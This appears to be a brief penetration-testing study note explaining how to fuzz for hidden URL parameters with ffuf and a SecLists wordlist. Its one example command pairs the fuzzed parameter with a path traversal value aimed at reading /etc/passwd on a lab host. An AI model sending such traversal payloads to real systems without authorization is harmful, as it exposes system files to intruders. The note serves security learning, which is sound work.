We can discover hidden parameters in URLs by fuzzing them

Parameter Fuzzing

we can use ffuf to fuzz for parameters along with the SecLists wordlist for parameters

in this example, nothing was found, only this file.php which was blank. what do we do? fuzz for hidden parameters!

ffuf -u 10.10.14.89/console/file.php?FUZZ=../../../../../etc/passwd -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt